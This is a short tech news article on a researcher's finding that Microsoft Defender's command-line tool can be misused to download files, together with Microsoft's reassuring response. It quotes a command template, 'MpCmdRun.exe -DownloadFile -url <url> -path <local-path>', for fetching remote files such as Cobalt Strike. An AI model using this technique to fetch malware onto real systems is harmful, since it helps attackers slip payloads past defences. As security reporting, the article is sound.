Microsoft previously added the ability to download files through the command line in Microsoft Defender. Tester Mohammad Askar said that changes to the Microsoft Defender command-line tool may allow attackers to use it to download malicious programs.
According to the foreign media MSPoweruser report, Microsoft has responded in a statement saying:
Despite these reports, Microsoft Defender Antivirus and Microsoft Defender ATP will still protect customers from malicious software. These programs will detect malicious files downloaded to the system through the antivirus file download function.
Microsoft also stated that this feature cannot be used for privilege escalation.
▲ Source: MSPoweruser
Naijatechnews learned that Askar previously stated that the Microsoft Defender command line tool supports the new “-DownloadFile” function. An attacker can use the Microsoft Anti-Malware Service command line utility to download files from the Internet with the following command: “MpCmdRun.exe -DownloadFile -url <url> -path >local-path>”.
In this way, Askar was able to download the Cobalt Strike malware from a remote location directly through Microsoft Defender.
For more such interesting article like this, app/softwares, games, Gadget Reviews, comparisons, troubleshooting guides, listicles, and tips & tricks related to Windows, Android, iOS, and macOS, follow us on Google News, Facebook, Instagram, Twitter, YouTube, and Pinterest.